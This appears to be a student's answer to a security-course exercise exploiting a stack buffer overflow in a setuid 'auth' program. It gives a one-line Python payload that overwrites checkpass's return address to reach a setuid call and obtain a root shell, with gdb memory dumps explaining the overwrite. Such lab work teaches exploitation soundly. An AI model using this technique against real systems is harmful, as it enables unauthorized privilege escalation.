CamilStaps-s4498062-Assignment-3/ex4


1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47

a
    That would be 0x40085a.

b
    Done. That gives a root shell:

    $ ./auth "$(python -c 'import struct; print "A"*264+struct.pack("<Q",0x40085a)')"
    ERROR: password incorrect
    # 
    Segmentation fault

c
    The return address of checkpass has been overwritten with the address of the
    setuid call. So, after executing checkpass as normally, we 'return' to that
    setuid call. This explains why we don't read "Starting root shell".

        (gdb) ...
        0x000000000040082d  14      strcpy(password,input);
           0x000000000040082a <checkpass+10>:   48 89 e7    mov    rdi,rsp
        => 0x000000000040082d <checkpass+13>:   e8 0e fe ff ff  call   0x400640 <strcpy@plt>
        (gdb) x /64bx ($rsp+256)
        0x7ffe5af18c50: 0x40    0x8d    0xf1    0x5a    0xfe    0x7f    0x00    0x00
    --> 0x7ffe5af18c58: 0xf2    0x06    0x40    0x00    0x00    0x00    0x00    0x00
        0x7ffe5af18c60: 0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
        0x7ffe5af18c68: 0x45    0x9b    0x05    0x5d    0xdc    0x7f    0x00    0x00
        0x7ffe5af18c70: 0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
        0x7ffe5af18c78: 0x48    0x8d    0xf1    0x5a    0xfe    0x7f    0x00    0x00
        0x7ffe5af18c80: 0x00    0x00    0x00    0x00    0x02    0x00    0x00    0x00
        0x7ffe5af18c88: 0xe0    0x06    0x40    0x00    0x00    0x00    0x00    0x00
        (gdb) ni
        15      hash1 = crypt(password,"$6$1122334455667788$");
        => 0x0000000000400832 <checkpass+18>:   be 24 09 40 00  mov    esi,0x400924
           0x0000000000400837 <checkpass+23>:   48 89 e7    mov    rdi,rsp
           0x000000000040083a <checkpass+26>:   e8 41 fe ff ff  call   0x400680 <crypt@plt>
        (gdb) x /64bx ($rsp+256)
        0x7ffe5af18c50: 0x41    0x41    0x41    0x41    0x41    0x41    0x41    0x41
    --> 0x7ffe5af18c58: 0x5a    0x08    0x40    0x00    0x00    0x00    0x00    0x00
        0x7ffe5af18c60: 0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
        0x7ffe5af18c68: 0x45    0x9b    0x05    0x5d    0xdc    0x7f    0x00    0x00
        0x7ffe5af18c70: 0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
        0x7ffe5af18c78: 0x48    0x8d    0xf1    0x5a    0xfe    0x7f    0x00    0x00
        0x7ffe5af18c80: 0x00    0x00    0x00    0x00    0x02    0x00    0x00    0x00
        0x7ffe5af18c88: 0xe0    0x06    0x40    0x00    0x00    0x00    0x00    0x00

    The relevant line is marked with -->. Before the strcpy, the correct return
    address is there. After, there is our own address.